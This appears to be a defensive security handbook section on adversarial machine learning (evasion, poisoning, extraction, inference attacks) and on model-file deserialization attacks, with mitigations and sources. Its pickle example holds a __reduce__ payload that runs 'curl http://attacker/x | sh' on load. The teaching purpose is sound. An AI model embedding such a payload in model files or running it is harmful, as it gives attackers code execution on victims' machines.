Adversarial machine learning

A decade of work that still governs any classifier in an estate (fraud, malware, vision, biometrics) and underlies the embedding, multimodal, and infra attacks later. Five families, each with a worked example.

Family	Target / asset	Canonical example
Evasion	Inference-time decision	FGSM/PGD perturbations flip a malware or image classifier (Goodfellow; Madry)
Poisoning / backdoor	Training/fine-tune data	BadNets trigger: model behaves until it sees the attacker’s cue (Gu)
Extraction	Model IP via API	Rebuild a functional copy from query/response pairs (Tramèr)
Membership inference	Training-set privacy	Was this record used to train? (Shokri)
Model inversion	Training-data reconstruction	Recover representative faces from a recognition model (Fredrikson)

# A tiny perturbation in the direction that most increases the model's loss
# flips the prediction while looking unchanged to a human.
perturbation = epsilon * sign( gradient_of_loss_wrt_input )   # epsilon ~ a few /255
adversarial_image = original_image + perturbation
# model(original_image)    -> "stop sign"  (0.98)
# model(adversarial_image) -> "speed limit" (0.91)   visually identical
# DEFENSE: adversarial training (train on such examples), input
# transformation/randomization, and report robustness under PGD, not just FGSM.

That single idea - move along the gradient of the loss - underlies the whole family; stronger attacks (PGD) just iterate it, and transfer means an attacker can craft it on a surrogate model and fire it at yours (II.18 covers the text-domain analogue).

Canon

Goodfellow 2014 — Explaining & Harnessing Adversarial Examples (FGSM) — arXiv:1412.6572
Madry 2017 — Resistance to Adversarial Attacks (PGD) — arXiv:1706.06083
Gu 2017 — BadNets - backdoor attacks — arXiv:1708.06733
Tramèr 2016 — Stealing ML Models via Prediction APIs — USENIX Security

▸ For the organization

Inventory every model making a security or eligibility decision; pen-test it as a tamperable control.
If you fine-tune or run RAG, treat the data pipeline as attacker-reachable: validate sources, sign datasets, test for backdoors before promotion.
Rate-limit and monitor prediction APIs against extraction.

Model files are executable: serialization & deserialization attacks

A trained model ships as a file, and the common formats are not inert data - they run code when loaded. Python’s pickle (used by PyTorch’s torch.load, scikit-learn, and joblib), plus TensorFlow/Keras Lambda layers, TorchScript, and HDF5, all permit executable callbacks during deserialization. Loading an attacker’s model file is therefore arbitrary code execution on the machine that loads it - a supply-chain RCE that needs no exploit, just model.load(). The pickle RCE primitive has been known since 2011; what changed is that model-sharing hubs turned it into a distribution channel.

# pickle calls __reduce__ on load to reconstruct an object; an attacker
# returns a callable + args, and the "reconstruction" runs their code.
class Payload:
    def __reduce__(self):
        import os
        return (os.system, ("curl http://attacker/x | sh",))   # runs on torch.load()
# Saved into a .bin/.pt/.pkl model, this executes the moment a victim loads it.
# DEFENSE: never load untrusted pickle; prefer safetensors (weights only, no code);
# PyTorch weights_only=True is the default since v2.6; scan in CI before promotion.

This is live, not theoretical. JFrog found a Hugging Face model carrying a silent reverse-shell backdoor in 2024; in February 2025 ReversingLabs disclosed nullifAI, where deliberately “broken” pickle files executed a reverse shell while evading Hugging Face’s picklescan. One study tracked a roughly 5× year-over-year rise in malicious model uploads, on a hub where pickle repositories still see billions of downloads a month. Hugging Face scans uploads (ClamAV for malware, picklescan for pickle imports, TruffleHog for secrets) but marks rather than blocks unsafe models - the download-and-run decision is still yours.

Defenses for the model artifact

Prefer safetensors - it encodes only tensor data, no executable opcodes, so the deserialization-RCE class is designed out.
Use restricted loaders - PyTorch’s weights-only unpickler (weights_only=True) is the default from v2.6, refusing arbitrary callables on load.
Scan every third-party model in CI - ModelScan (Protect AI), Fickling (Trail of Bits), and picklescan as a promotion gate before a model reaches a registry.
Treat model files as untrusted executables - sandbox loading of anything unverified, and require provenance/signing before use (§16).

Sources

ReversingLabs 2025 — nullifAI - malicious models evading picklescan — reversinglabs.com, Feb 2025
JFrog 2024 — Malicious HF model, silent backdoor — jfrog.com
PyTorch / HF — weights-only unpickler (default v2.6+); safetensors — safe model format